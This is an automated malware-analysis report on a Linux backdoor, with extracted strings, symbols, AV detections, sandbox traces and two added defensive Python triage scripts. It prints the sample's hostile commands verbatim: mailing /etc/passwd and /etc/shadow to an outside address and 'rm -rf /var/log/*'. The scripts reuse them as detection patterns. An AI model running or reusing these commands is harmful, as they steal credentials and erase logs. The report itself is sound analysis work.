Report #9847

Binary
ABI
ELFOSABI_SYSV
Size
7.96KB
Type
ET_EXEC
trid
50.1% ELF Executable and Linkable format
49.8% ELF Executable and Linkable format
type
ELF
Wordsize
32
Architecture
x86
Hashes
md5
3d06f85ac19dc1a6f678aa4e28ce5c42
sha1
53133505622a36855141f2e9ec230f00e4e7107c
crc32
0xc960caa0
sha224
894da72ab14230a184530d4a4ce212615d4937cc0336816712dcd752
sha256
6138054a7de11c23b5c26755d7548c4096fa547cbb964ac78ef0fbe59d16c2da
sha384
bc4f3745a14c595440d4a72f98844e3e3cf5c423c7c91ffad5dac9b1021f17a26f4bdf5b8acced384f0637bbefacc828
sha512
605c8397f4a1897bc3a93c27ade14423d82a4bbb452bfd40023aa036788791ad0ccdbd8e969ef179f3dc6435f3ce13d6116c1c7b60d8491ca2519f17409b9f31
ssdeep
192:ffg/T/mqZlmfdswJLE11111JDxcumBWHicdw:ffa/mqZlVd11111hxABPf
Community
Google
False
HashLib
False
YARA
Matches
maldoc_getEIP_method_1, domain, contentis_base64, is__elf
(All four are generic rules and none names the family: is__elf keys on the ELF magic, domain and contentis_base64 on string content, and maldoc_getEIP_method_1 on the call/pop GetPC instruction sequence. The GCC startup stub call_gmon_start in the symbol list below loads the GOT address with exactly that call/pop sequence, which is the likely source of the match.)

Suspicious
True

Dwarf
List

Number
0
Files
Sys

Home

Proc

Password
mail -s passwdforyababe gayz0r@boi.org.ie < /etc/passwd, mail -s shadowforyababe gayz0r@boi.org.ie < /etc/shadow
Suspicious
True
Flags
Flags
0
Packer
List
None
Packed
False
Network
IPs

URLs
/lib/ld-linux.so.2, mail -s passwdforyababe gayz0r@boi.org.ie < /etc/passwd, mail -s shadowforyababe gayz0r@boi.org.ie < /etc/shadow
(none of these is a URL: the first is the ELF interpreter path, the other two are shell commands; the sample carries no network address or URL as a string)
Mails
mail -s passwdforyababe gayz0r@boi.org.ie < /etc/passwd, mail -s shadowforyababe gayz0r@boi.org.ie < /etc/shadow
(the recipient in both commands is gayz0r@boi.org.ie; each command pipes a credential file to mail(1), which is the sample's exfiltration channel)
Suspicious
True
Strings
List
mail -s passwdforyababe gayz0r@boi.org.ie < /etc/passwd
mail -s shadowforyababe gayz0r@boi.org.ie < /etc/shadow
libc.so.6
.rel.plt
.rel.dyn
/lib/ld-linux.so.2
When you 'exit' this shell the UDP bd seems to exit. But it doesn't...
Brand new TCP root shell!
[crond]
__deregister_frame_info
__register_frame_info
server.c
mailpasswd
bindshell
socket@@GLIBC_2.0
execl@@GLIBC_2.0
Listen error
listen@@GLIBC_2.0
__deregister_frame_info@@GLIBC_2.0
Socket error
__register_frame_info@@GLIBC_2.0
socket
socket
accept
system
bind
bind
send
.hash
Please enter each command followed by ';'
GLIBC_2.0
object.11
dup2@@GLIBC_2.0
completed.4
.comment
gcc2_compiled.
__DTOR_END__
__CTOR_END__
__FRAME_END__
__EH_FRAME_BEGIN__
__DTOR_LIST__
__CTOR_LIST__
_GLOBAL_OFFSET_TABLE_
_DYNAMIC
call_gmon_start
init_dummy
fini_dummy
frame_dummy
data_start
.dynamic
__gmon_start__
__gmon_start__
force_to_data
.note.ABI-tag
.gnu.version
.shstrtab
.eh_frame
_IO_stdin_used
_IO_stdin_used
crtstuff.c
__libc_start_main
__do_global_ctors_aux
__do_global_dtors_aux
.gnu.version_r
__dso_handle
__data_start
.rodata
.interp
__bss_start
mailshadow
/bin/sh
removealllogs
mailstuff
01.01
01.01
01.01
01.01
01.01
01.01
.strtab
.symtab
rm -rf /var/log/*
_edata
_fini
.init
.fini
_init
Accept error
Bind error
.dynsym
.dynstr
.dtors
.ctors
_start
Letext
close
PTRh`
.got
_end
main
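The strings above describe the backdoor's behaviour directly: two mail(1) commands that send /etc/passwd and /etc/shadow to gayz0r@boi.org.ie, rm -rf /var/log/*, /bin/sh, the socket/bind/listen/accept/dup2/execl import set of a bind shell, and the kernel-thread-style name [crond]. As an added example, not the analysis platform's code, the following extracts printable strings from a blob the way strings(1) does and turns them into behaviour tags plus the exfil recipient (which the Mails field above should have listed instead of whole commands). The blob it runs on is constructed from the strings listed here and is not the real binary; reading [crond] as a process-name disguise is an assumption, since the report shows the string but not how it is used.

```python
"""String-based triage for the behaviours the Strings list above exposes.
Added example, not the analysis platform's code; the sample blob is
constructed from the report's strings and is not the real binary."""
import re

MIN_LEN = 4

# (regex over one extracted string, tag). The masquerade rule assumes "[crond]"
# is meant as a fake process name; the report shows the string, not its use.
INDICATORS = [
    (re.compile(rb"^mail -s \S+ \S+@\S+ < /etc/(passwd|shadow)$"), "credential-exfil-via-mail"),
    (re.compile(rb"^rm -rf /var/log/"), "log-wiping"),
    (re.compile(rb"^\[[a-z]+\]$"), "process-name-masquerade"),
    (re.compile(rb"^/bin/sh$"), "shell-spawn"),
]
# All of these imported together is the bind-shell skeleton: listen, accept,
# dup2 the socket over stdio, execl a shell.
BINDSHELL_IMPORTS = {b"socket", b"bind", b"listen", b"accept", b"dup2", b"execl"}


def extract_strings(data: bytes, min_len: int = MIN_LEN) -> list:
    """Printable-ASCII runs of at least min_len bytes, like strings(1) -a."""
    return re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)


def import_names(strings) -> set:
    """Symbol names with any @GLIBC_x.y / @@GLIBC_x.y version suffix stripped."""
    return {s.split(b"@", 1)[0] for s in strings}


def exfil_targets(strings) -> list:
    """Recipient addresses of mail(1) exfil commands."""
    hits = set()
    for s in strings:
        m = re.match(rb"^mail -s \S+ (\S+@\S+) <", s)
        if m:
            hits.add(m.group(1).decode("ascii"))
    return sorted(hits)


def classify(strings) -> set:
    """Behaviour tags supported by the extracted strings."""
    tags = set()
    for s in strings:
        for rx, tag in INDICATORS:
            if rx.search(s):
                tags.add(tag)
    if BINDSHELL_IMPORTS <= import_names(strings):
        tags.add("bind-shell")
    return tags


def triage(data: bytes) -> dict:
    strings = extract_strings(data)
    return {"tags": classify(strings), "mail_targets": exfil_targets(strings)}


def build_sample() -> bytes:
    """Constructed blob: the report's notable strings, NUL-separated as they
    would sit in .rodata/.dynstr/.strtab, with non-printable filler around them."""
    notable = [
        b"mail -s passwdforyababe gayz0r@boi.org.ie < /etc/passwd",
        b"mail -s shadowforyababe gayz0r@boi.org.ie < /etc/shadow",
        b"rm -rf /var/log/*", b"/bin/sh", b"[crond]", b"Brand new TCP root shell!",
        b"socket", b"bind", b"listen@@GLIBC_2.0", b"accept",
        b"dup2@@GLIBC_2.0", b"execl@@GLIBC_2.0",
        b"libc.so.6", b"/lib/ld-linux.so.2",
    ]
    return b"\x7fELF\x01\x01\x01" + b"\0".join(notable) + b"\0\x90\x90\xcc"


if __name__ == "__main__":
    print(triage(build_sample()))
```

The import check strips version suffixes because the same name shows up both bare (from .dynstr) and as name@@GLIBC_2.0 (from .strtab), as the list above shows for listen, dup2 and execl.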

Symbols
List
Letext, gcc2_compiled., call_gmon_start, crtstuff.c, gcc2_compiled., p.3, __DTOR_LIST__, completed.4, __do_global_dtors_aux, __EH_FRAME_BEGIN__, fini_dummy, object.11, frame_dummy, init_dummy, force_to_data, __CTOR_LIST__, crtstuff.c, gcc2_compiled., __do_global_ctors_aux, __CTOR_END__, init_dummy, force_to_data, __DTOR_END__, __FRAME_END__, gcc2_compiled., server.c, gcc2_compiled., __dso_handle, execl@@GLIBC_2.0, mailshadow, _DYNAMIC, quit, __register_frame_info@@GLIBC_2.0, recvfrom@@GLIBC_2.0, close@@GLIBC_2.0, _fp_hw, perror@@GLIBC_2.0, fork@@GLIBC_2.0, signal@@GLIBC_2.0, mailstuff, accept@@GLIBC_2.0, system@@GLIBC_2.0, _init, listen@@GLIBC_2.0, __deregister_frame_info@@GLIBC_2.0, removealllogs, _start, strlen@@GLIBC_2.0, mailpasswd, __bss_start, main, __libc_start_main@@GLIBC_2.0, bindshell, dup2@@GLIBC_2.0, data_start, printf@@GLIBC_2.0, bind@@GLIBC_2.0, _fini, bzero@@GLIBC_2.0, exit@@GLIBC_2.0, _edata, _GLOBAL_OFFSET_TABLE_, _end, send@@GLIBC_2.0, htons@@GLIBC_2.0, _IO_stdin_used, __data_start, socket@@GLIBC_2.0, __gmon_start__, strcpy@@GLIBC_2.0
Number
97
Reason
None
Suspicious
False
Version
Version
EV_CURRENT
Foremost
Matches
None
Suspicious
False
Sections
List
, .interp, .note.ABI-tag, .hash, .dynsym, .dynstr, .gnu.version, .gnu.version_r, .rel.dyn, .rel.plt, .init, .plt, .text, .fini, .rodata, .data, .eh_frame, .dynamic, .ctors, .dtors, .got, .bss, .comment, .note, .shstrtab, .symtab, .strtab
Number
27
Suspicious
False
Segments
Number
6
Suspicious
False
Compilers
List
GCC: (GNU) 2.95.4 20011002 (Debian prerelease) (6 occurrences, one per object file in .comment), gcc2_compiled.
Identified
7
Suspicious
True
Functions
List
Imported (undefined symbols, all versioned GLIBC_2.0; the "(2)" after each in the raw output is readelf's version index): execl, __register_frame_info, recvfrom, close, perror, fork, signal, accept, system, listen, __deregister_frame_info, strlen, __libc_start_main, dup2, printf, bind, bzero, exit, send, htons, socket, strcpy. Unversioned: _IO_stdin_used, __gmon_start__. The rest of the raw list repeats the Symbols list above.
Present
True
Anti-Debug
Ptrace
False
Anti-disasm
False
Entry Point
Address
0x8048700
Suspicious
False
Embedded ELF
List
None
Identified
0
Program Header
Size
32
Number
6
Offset
52
Section Header
Size
40
Number
27
Offset
4612
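The header-derived fields in this report (ABI, Type, Wordsize and Architecture in the Binary section; Entry Point, Program Header and Section Header here) all come straight out of the 52-byte ELF32 header. The following is an added worked example, not the analysis platform's code, that decodes those fields and then walks the program header table for PT_INTERP, the check that decides whether a sample is dynamically linked. The image it parses is constructed to carry this report's header values (entry 0x8048700, 6 program headers of 32 bytes at offset 52, 27 section headers of 40 bytes at offset 4612) and is not the analysed binary; the segment types other than PT_INTERP are assumptions, and the section table itself is not populated.

```python
"""ELF32 header triage: the header-derived fields reported above plus the
PT_INTERP check that separates a dynamically linked executable from a static
one. Added example, not the analysis platform's own code."""
import struct

ELF_MAGIC = b"\x7fELF"
EI_CLASS, EI_DATA, EI_OSABI = 4, 5, 7          # offsets into e_ident
ET_NAMES = {0: "ET_NONE", 1: "ET_REL", 2: "ET_EXEC", 3: "ET_DYN", 4: "ET_CORE"}
OSABI_NAMES = {0: "ELFOSABI_SYSV", 3: "ELFOSABI_LINUX"}
MACHINE_NAMES = {3: "x86", 40: "ARM", 62: "x86-64", 183: "AArch64"}
PT_INTERP = 3
EHDR_FMT = "<HHIIIIIHHHHHH"   # ELF32 header fields after the 16-byte e_ident
PHDR_FMT = "<IIIIIIII"        # one ELF32 program header (32 bytes)


def parse_elf32_header(data: bytes) -> dict:
    """Decode the 52-byte little-endian ELF32 header; ValueError on anything else."""
    if len(data) < 52 or data[:4] != ELF_MAGIC:
        raise ValueError("not an ELF image")
    if data[EI_CLASS] != 1 or data[EI_DATA] != 1:
        raise ValueError("only ELFCLASS32 / little-endian handled here")
    (e_type, e_machine, e_version, e_entry, e_phoff, e_shoff, _flags, _ehsize,
     e_phentsize, e_phnum, e_shentsize, e_shnum, _shstrndx) = struct.unpack_from(EHDR_FMT, data, 16)
    return {
        "abi": OSABI_NAMES.get(data[EI_OSABI], f"unknown({data[EI_OSABI]})"),
        "type": ET_NAMES.get(e_type, f"unknown({e_type})"),
        "wordsize": 32,
        "architecture": MACHINE_NAMES.get(e_machine, f"unknown({e_machine})"),
        "version": "EV_CURRENT" if e_version == 1 else f"unknown({e_version})",
        "entry": e_entry,
        "phoff": e_phoff, "phentsize": e_phentsize, "phnum": e_phnum,
        "shoff": e_shoff, "shentsize": e_shentsize, "shnum": e_shnum,
    }


def interpreter(data: bytes, hdr: dict):
    """Path from the PT_INTERP segment, or None when there is none (static binary)."""
    for i in range(hdr["phnum"]):
        off = hdr["phoff"] + i * hdr["phentsize"]
        if off + struct.calcsize(PHDR_FMT) > len(data):
            raise ValueError("program header table runs past end of image")
        p_type, p_offset, _va, _pa, p_filesz, _memsz, _pflags, _align = struct.unpack_from(PHDR_FMT, data, off)
        if p_type == PT_INTERP:
            if p_offset + p_filesz > len(data):
                raise ValueError("PT_INTERP points outside the image")
            return data[p_offset:p_offset + p_filesz].rstrip(b"\0").decode("ascii")
    return None


def triage(data: bytes) -> dict:
    hdr = parse_elf32_header(data)
    hdr["interpreter"] = interpreter(data, hdr)
    hdr["linkage"] = "dynamic" if hdr["interpreter"] else "static"
    return hdr


def build_sample() -> bytes:
    """Constructed ELF32 image (not the analysed binary) whose header carries the
    report's values: entry 0x8048700, 6 program headers of 32 bytes at offset 52,
    27 section headers of 40 bytes at offset 4612, .shstrtab at section index 24
    (its position in the Sections list). Only the header and the program header
    table are populated; there is no section table in this image."""
    interp = b"/lib/ld-linux.so.2\0"
    interp_off = 52 + 6 * 32
    e_ident = ELF_MAGIC + bytes([1, 1, 1, 0, 0]) + b"\0" * 7   # class32, LE, version 1, SYSV, abiversion 0
    ehdr = e_ident + struct.pack(EHDR_FMT, 2, 3, 1, 0x8048700, 52, 4612, 0, 52, 32, 6, 40, 27, 24)
    # Segment types other than PT_INTERP are placeholders; the report only gives the count (6).
    segments = [(6, 52, 192), (PT_INTERP, interp_off, len(interp)), (1, 0, 0x1000),
                (1, 0x1000, 0x200), (2, 0, 0), (4, 0, 0)]
    phdrs = b"".join(struct.pack(PHDR_FMT, t, off, 0, 0, sz, sz, 5, 4) for t, off, sz in segments)
    return ehdr + phdrs + interp


if __name__ == "__main__":
    for k, v in triage(build_sample()).items():
        print(f"{k:13} {v:#x}" if k == "entry" else f"{k:13} {v}")
```

Running it on the constructed image reproduces the report's fields and reports linkage "dynamic" because of the /lib/ld-linux.so.2 interpreter, which is the same evidence (the .interp section and the GLIBC_2.0 imports) that contradicts the "statically-compiled" explanation given for the empty ltrace later in this report.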
AVclass
excedoor
1
VirusTotal
md5
3d06f85ac19dc1a6f678aa4e28ce5c42
sha1
53133505622a36855141f2e9ec230f00e4e7107c
SCANS (DETECTION RATE = 72.13%, 44 of 61 engines)
Engine | Result | Update | Version | Detected
AVG | ELF:Malware-gen | 20191208 | 18.4.3895.0 | True
CMC | Generic.Win32.3d06f85ac1!MD | 20190321 | 1.1.0.977 | True
MAX | malware (ai score=100) | 20191208 | 2019.9.16.1 | True
Bkav | - | 20191207 | 1.3.0.9899 | False
K7GW | - | 20191208 | 11.81.32764 | False
ALYac | Backdoor.Linux.Excedoor.A | 20191208 | 1.1.1.5 | True
Avast | ELF:Malware-gen | 20191208 | 18.4.3895.0 | True
Avira | BDS/Excedoor.A | 20191208 | 8.3.3.8 | True
Baidu | - | 20190318 | 1.0.0.2 | False
Cyren | Unix/Excedoor | 20191208 | 6.2.2.2 | True
DrWeb | Linux.BackDoor.Exced | 20191208 | 7.0.42.9300 | True
GData | Backdoor.Linux.Excedoor.A | 20191208 | A:25.24206B:26.16924 | True
Panda | Bck/Linux.Excedoor | 20191208 | 4.6.4.2 | True
VBA32 | - | 20191206 | 4.2.0 | False
VIPRE | - | 20191208 | 79884 | False
Zoner | - | 20191207 | 1.0.0.1 | False
ClamAV | - | 20191208 | 0.102.1.0 | False
Comodo | Backdoor@#iviv2mc7z3wn | 20191208 | 31817 | True
F-Prot | Unix/Excedoor | 20191208 | 4.7.1.166 | True
Ikarus | Trojan.Linux.Excedoor | 20191208 | 0.1.5.2 | True
McAfee | Linux/BackDoor.c-Excedoor | 20191208 | 6.0.6.653 | True
Rising | Backdoor.Linux.udt (CLASSIC) | 20191208 | 25.0.0.24 | True
Sophos | Troj/Gazor-A | 20191208 | 4.98.0 | True
Yandex | Backdoor.Linux.Excedoor.B | 20191205 | 5.5.2.24 | True
Zillya | Backdoor.Excedoor.Linux.1 | 20191207 | 2.0.0.3969 | True
Arcabit | Backdoor.Linux.Excedoor.A | 20191208 | 1.0.0.865 | True
FireEye | Backdoor.Linux.Excedoor.A | 20191208 | 29.7.0.0 | True
Sangfor | Malware | 20191031 | 1.0 | True
TACHYON | - | 20191208 | 2019-12-08.02 | False
Tencent | - | 20191208 | 1.0.0.1 | False
ViRobot | Linux.S.Excedoor.8149 | 20191208 | 2014.3.20.0 | True
Ad-Aware | Backdoor.Linux.Excedoor.A | 20191208 | 3.0.5.370 | True
AegisLab | Trojan.Linux.Excedoor.m!c | 20191208 | 4.2 | True
Emsisoft | Backdoor.Linux.Excedoor.A (B) | 20191208 | 2018.12.0.1641 | True
F-Secure | Backdoor.BDS/Excedoor.A | 20191208 | 12.0.86.52 | True
Fortinet | Linux/Gazor.A!tr | 20191208 | 6.2.137.0 | True
Jiangmin | Backdoor/Linux.c | 20191208 | 16.0.100 | True
Kingsoft | - | 20191208 | 2013.8.14.323 | False
Symantec | Backdoor.Trojan | 20191207 | 1.11.0.0 | True
AhnLab-V3 | Linux/Excedoor.8149 | 20191208 | 3.16.5.25880 | True
Antiy-AVL | Trojan[Backdoor]/Linux.Excedoor | 20191208 | 3.0.0.1 | True
Kaspersky | Backdoor.Linux.Excedoor | 20191208 | 15.0.1.13 | True
MaxSecure | - | 20191207 | 1.0.0.1 | False
Microsoft | Backdoor:Linux/Excedoor | 20191208 | 1.1.16600.7 | True
Qihoo-360 | Malware.Radar01.Gen | 20191208 | 1.0.0.1120 | True
ZoneAlarm | Backdoor.Linux.Excedoor | 20191208 | 1.0 | True
ESET-NOD32 | Linux/Excedoor.10 | 20191208 | 20476 | True
TrendMicro | ELF_EXEDOOR.A | 20191208 | 11.0.0.1006 | True
BitDefender | Backdoor.Linux.Excedoor.A | 20191208 | 7.2 | True
K7AntiVirus | - | 20191208 | 11.81.32765 | False
SentinelOne | DFI - Malicious ELF | 20191203 | 1.9.0.2431 | True
Avast-Mobile | - | 20191205 | 191205-00 | False
Malwarebytes | - | 20191208 | 2.1.1.1115 | False
TotalDefense | - | 20191208 | 37.1.62.1 | False
CAT-QuickHeal | Linux.Backdoor.Excedoor | 20191208 | 14.00 | True
NANO-Antivirus | Trojan.Elf32.Excedoor.htzb | 20191208 | 1.0.134.24859 | True
BitDefenderTheta | - | 20191204 | 7.2.37796.0 | False
MicroWorld-eScan | Backdoor.Linux.Excedoor.A | 20191208 | 14.0.297.0 | True
SUPERAntiSpyware | - | 20191203 | 5.6.0.1032 | False
McAfee-GW-Edition | Linux/BackDoor.c-Excedoor | 20191208 | v2017.3010 | True
TrendMicro-HouseCall | ELF_EXEDOOR.A | 20191208 | 10.0.0.1040 | True
total
61
sha256
6138054a7de11c23b5c26755d7548c4096fa547cbb964ac78ef0fbe59d16c2da
scan_id
6138054a7de11c23b5c26755d7548c4096fa547cbb964ac78ef0fbe59d16c2da-1575818844
resource
3d06f85ac19dc1a6f678aa4e28ce5c42
positives
44
scan_date
2019-12-08 15:27:24
verbose_msg
Scan finished, information embedded
response_code
1
Ltrace
Trace

Strace
Trace
4291 execve("./malware", ["./malware"]) = -1 ENOENT (No such file or directory)
4291 write(2, "strace: exec: No such file or di"..., 40) = 40
4291 exit_group(1) = ?

Analysis
Ltrace
Statically-compiled samples cannot be ltraced.
(This is the platform's canned explanation and it does not fit the sample: the binary has an .interp section naming /lib/ld-linux.so.2 and imports versioned GLIBC_2.0 symbols, so it is dynamically linked. The strace above shows the sandbox's execve("./malware") failing with ENOENT, so the sample was never executed; the empty ltrace and the empty DNS/TCP/UDP/HTTP tables below record a failed launch, not a quiet sample.)

Reason
Timeout

Status
Success

Strace
Success

Results
True

DNS
Query

Response

TCP
Info

UDP
Info

HTTP
Info

Summary
DNS
False

TCP
False

UDP
False

HTTP
False

Binary
RF
confidence: 64.65%
suspicious: False
MLP
confidence: 80.32%
suspicious: False
SVM
confidence: 77.31%
suspicious: False
(All three classifiers rate the sample as not suspicious, against 44 of 61 AV engines, the credential-exfil and log-wiping strings, and the bind-shell import set listed above; the model verdicts are the weakest signal in this report.)